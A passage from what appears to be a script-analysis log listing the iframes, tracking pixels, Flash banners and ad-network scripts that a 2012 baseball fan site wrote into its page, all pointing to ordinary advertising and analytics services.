src="http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&vpid=1&referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&media_subtypes=1&dlo=1"></iframe>

#43 JavaScript::Write (size: 360, repeated: 1)

<iframe id="pmInfoFrm_top_0_0" name="pmAdInfoFrm" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/adTagInfo.html" onload="PubMatic.pmAdInfo.infoFrameLoaded(this,'top_0_0')"></iframe>

#44 JavaScript::Write (size: 360, repeated: 1)

<iframe id="pmInfoFrm_top_0_1" name="pmAdInfoFrm" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/adTagInfo.html" onload="PubMatic.pmAdInfo.infoFrameLoaded(this,'top_0_1')"></iframe>

#45 JavaScript::Write (size: 299, repeated: 1)

<iframe name="dpsynciframe" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&s=28597&a=24364"></iframe>

#46 JavaScript::Write (size: 662, repeated: 1)

<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no"  width="0"  height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24363&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=2&kadwidth=300&kadheight=250&kadsizeid=9&kltstamp=1353202243&indirectAdId=0&adServerOptimizerId=2&ranreq=0.10823524911231308&kpbmtpfact=0.457674&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"> </iframe>

#47 JavaScript::Write (size: 661, repeated: 1)

<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no"  width="0"  height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24364&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1353202240&indirectAdId=0&adServerOptimizerId=2&ranreq=0.917069314550122&kpbmtpfact=0.405375&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"> </iframe>

#48 JavaScript::Write (size: 218, repeated: 1)

<iframe name="serversidecall" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" src="http://image4.pubmatic.com/AdServer/SPug"></iframe>

#49 JavaScript::Write (size: 296, repeated: 1)

<iframe name="synciframe" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&s=28597"></iframe>

#50 JavaScript::Write (size: 338, repeated: 1)

<iframe name='pframe0' width='0' height='0' frameborder='0' marginwidth='0' marginheight='0' vspace='0' hspace='0' allowtransparency='true' scrolling='no' src=' http://pixel.invitemedia.com/pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=
&piggybackCookie= '></iframe>

#51 JavaScript::Write (size: 391, repeated: 1)

<iframe src="http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php" style="border: 0pt none; width: 1px; height: 1px; display: none;"></iframe>

#52 JavaScript::Write (size: 391, repeated: 1)

<iframe src="http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php" style="border: 0pt none; width: 1px; height: 1px; display: none;"></iframe>

#53 JavaScript::Write (size: 1314, repeated: 1)

<iframe width="160" scrolling="no" height="600" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4054&creative_id=378898&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1882693&b=rh56.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&us_id=5543&invite_uid=&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146840&campaign_id=252144&p_us_id=28812"></iframe>

#54 JavaScript::Write (size: 1351, repeated: 1)

<iframe width="300" scrolling="no" height="250" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4577&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1850887&b=rh176.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=560F290B-F280-4C2D-A29D-C38D70226966&us_id=5543&invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146842&campaign_id=252144&p_us_id=28812"></iframe>

#55 JavaScript::Write (size: 269, repeated: 1)

<img alt="" src="http://network.realmedia.com/5/track_targeting/124112090/x95/USNetwork/track_targeting/reporting/77352b4d336c436f4f6b594142396245?XE&MAX-Site=bloguin&MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&XE" style="display:none;" />

#56 JavaScript::Write (size: 281, repeated: 1)

<img name='pimg0' width='0' height='0' style='position: absolute; top: -15000px;' marginwidth='0' marginheight='0' vspace='0' hspace='0' allowtransparency='true' scrolling='no' src=' http://loadm.exelator.com/load/?p=204&g=071&j=0&buid=7577C4DA-3995-4153-9A0B-7C9927BF1013 '></img>

#57 JavaScript::Write (size: 139, repeated: 1)

<img src="http://ad.yieldmanager.com/cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1" width="1" height="1"/>

#58 JavaScript::Write (size: 141, repeated: 1)

<img src="http://cm.g.doubleclick.net/pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D" width="1" height="1"/>

#59 JavaScript::Write (size: 107, repeated: 1)

<img src="https://www.facebook.com/fr/u.php?p=391363987594223&m=5858721859426781856" width="1" height="1"/>

#60 JavaScript::Write (size: 132, repeated: 1)

<img src='http://b.scorecardresearch.com/b?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&cj=1' width='0' height='0' style='display: none;' />

#61 JavaScript::Write (size: 137, repeated: 1)

<img src='http://pixel.quantserve.com/pixel/p-a3g2Mplggde4A.gif' style='display: none;' border='0' height='1' width='1' alt='Quantcast'/>

#62 JavaScript::Write (size: 105, repeated: 1)

<img src='http://pt200191.unica.com/ntpagetag.gif?js=0&site=9859_fenway_west&account=yardbarkernetwork'/>

#63 JavaScript::Write (size: 10, repeated: 4)

<noscript>

#64 JavaScript::Write (size: 1888, repeated: 1)

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="base" width="300" height="250"><param name="movie" value="http://s0.2mdn.net/1585961/NO_b2c_A_300x250_nl_banner_131112_2012111308373038.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/90/%252a/m%253B265055682%253B0-0%253B0%253B90677916%253B4307-300/250%253B51411571/51378844/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1350046311133151043%26mt_id%3D239528%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677916%7C265055682%7C1349429%7C51411571%26WT.tsrc%3Ddisplay%26" /><param name="wmode" value="opaque" /><param name="bgcolor" value="#FFFFFF" /><param name="Autostart" value="true" /><param name="Quality" value="high" /><param name="allowScriptAccess" value="always" /><embed wmode="opaque" src="http://s0.2mdn.net/1585961/NO_b2c_A_300x250_nl_banner_131112_2012111308373038.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/90/%252a/m%253B265055682%253B0-0%253B0%253B90677916%253B4307-300/250%253B51411571/51378844/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1350046311133151043%26mt_id%3D239528%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677916%7C265055682%7C1349429%7C51411571%26WT.tsrc%3Ddisplay%26" swLiveConnect="TRUE" width="300" height="250" type="application/x-shockwave-flash" pluginspage="undefined//www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" bgcolor="#FFFFFF" quality="high" allowScriptAccess="always"></embed></object>

#65 JavaScript::Write (size: 2806, repeated: 1)

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="base" width="728" height="90"><param name="movie" value="http://s0.2mdn.net/1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/23f/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1371855818175741759%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26mt_3pck%3Dhttp%253A//adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%2526num%253D1%2526sig%253DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%2526client%253Dca-pub-7279410048024248%2526adurl%253D%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26" /><param name="wmode" value="opaque" /><param name="bgcolor" value="#FFFFFF" /><param name="Autostart" value="true" /><param name="Quality" value="high" /><param name="allowScriptAccess" value="always" /><embed wmode="opaque" src="http://s0.2mdn.net/1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/23f/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1371855818175741759%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26mt_3pck%3Dhttp%253A//adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%2526num%253D1%2526sig%253DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%2526client%253Dca-pub-7279410048024248%2526adurl%253D%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26" swLiveConnect="TRUE" width="728" height="90" type="application/x-shockwave-flash" pluginspage="undefined//www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" bgcolor="#FFFFFF" quality="high" allowScriptAccess="always"></embed></object>

#66 JavaScript::Write (size: 1455, repeated: 1)

<script language='JavaScript' src='http://bidder.mathtag.com/notify/js?exch=ctw&id=5aW95q2jLzEvUTFacmFXRlpjazF3UTFOb09WVkpkMjFCV2xwaFVRL05UQmhPRE5oTTJZdE9ESTBZeTAwT1RSakxXRTJZekV0T0dReU1UZzBOV000Tmpjei8xMzUwMDQ2MzExMTMzMTUxMDQzLzIzOTUyOC8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvRXVwMHNkdjktbGhqTE5QNTZmOXpaNC8/3pDavxPxc_C-g-kCsajJUFViM5k&sid=163481&cid=239528&price=UKg6wQAHgeAh-RGAaSg0v0MZ8gQ3ae_39Ttsbw'></script><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "0", c4: "800421", c5: "610742", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=800421&c5=610742&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN.610742.800421,,ADSIZE.300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66901&pid=520266"></iframe></div>

#67 JavaScript::Write (size: 156, repeated: 1)

<script src="http://cms.ad.yieldmanager.net/v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1" type="text/javascript"></script>

#68 JavaScript::Write (size: 227, repeated: 1)

<script src="http://tags.bluekai.com/site/2748?rg=production_bua&redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1" type="text/javascript"></script>

#69 JavaScript::Write (size: 102, repeated: 1)

<script src='http://b.scorecardresearch.com/beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=' ></script>

#70 JavaScript::Write (size: 84, repeated: 2)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#71 JavaScript::Write (size: 116, repeated: 1)

<script type="text/javascript" id="ncomments_js" src="http://livefyre.com/javascripts/ncomments.js#bn=858"></script>

#72 JavaScript::Write (size: 106, repeated: 1)

<script type="text/javascript" id="pmPostLoad_top_0_0" >PubMatic.pmAdInfo.jsAdLoaded( "top_0_0");</script>

#73 JavaScript::Write (size: 106, repeated: 1)

<script type="text/javascript" id="pmPostLoad_top_0_1" >PubMatic.pmAdInfo.jsAdLoaded( "top_0_1");</script>

#74 JavaScript::Write (size: 166, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=2;sz=160x600;ord=885814905?"></script>

#75 JavaScript::Write (size: 166, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=3;sz=300x250;ord=885814905?"></script>

#76 JavaScript::Write (size: 168, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=ist;yb=ad;s1=;s2=;tile=1;sz=728x90;ord=885814905?"></script>

#77 JavaScript::Write (size: 232, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=100&Z=300x250&s=1651067&r=0&_salt=420036788&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php"></script>

#78 JavaScript::Write (size: 395, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=140&Z=728x90&s=653070&r=0&_salt=1015090667&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html"></script>

#79 JavaScript::Write (size: 397, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=50&Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html"></script>

#80 JavaScript::Write (size: 481, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=007488868&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_referrer=http%3A%2F%2Fwww.shinynylonarts.com%2F&rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&rsi_inf=1"></script>

#81 JavaScript::Write (size: 450, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=281784345&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=160&rsi_height=600&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1"></script>

#82 JavaScript::Write (size: 448, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=474562717&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1"></script>

#83 JavaScript::Write (size: 692, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=160x600&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1916686269%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html"></script>

#84 JavaScript::Write (size: 434, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&inv_code=1651067&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D420036788%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"></script>

#85 JavaScript::Write (size: 687, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D653070%26r%3D0%26_salt%3D1015090667%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html"></script>

#86 JavaScript::Write (size: 1055, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ttj?id=919932&size=300x250&referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&pt1=http://network.realmedia.com/3/bloguin/Passback/124112090@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&ext_inv_code=bloguin&cb=124112090&reserve=0.25&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?"></script>

#87 JavaScript::Write (size: 117, repeated: 1)

<script type="text/javascript" src="http://s1.adformdsp.net/Banners/scripts/rmb/Adform.RMB.js?version=1-28"></script>

#88 JavaScript::Write (size: 121, repeated: 1)

<script type="text/javascript" src="http://s1.adformdsp.net/banners/scripts/bootstrap/Adform.Bootstrap.js?v=28"></script>

#89 JavaScript::Write (size: 1163, repeated: 1)

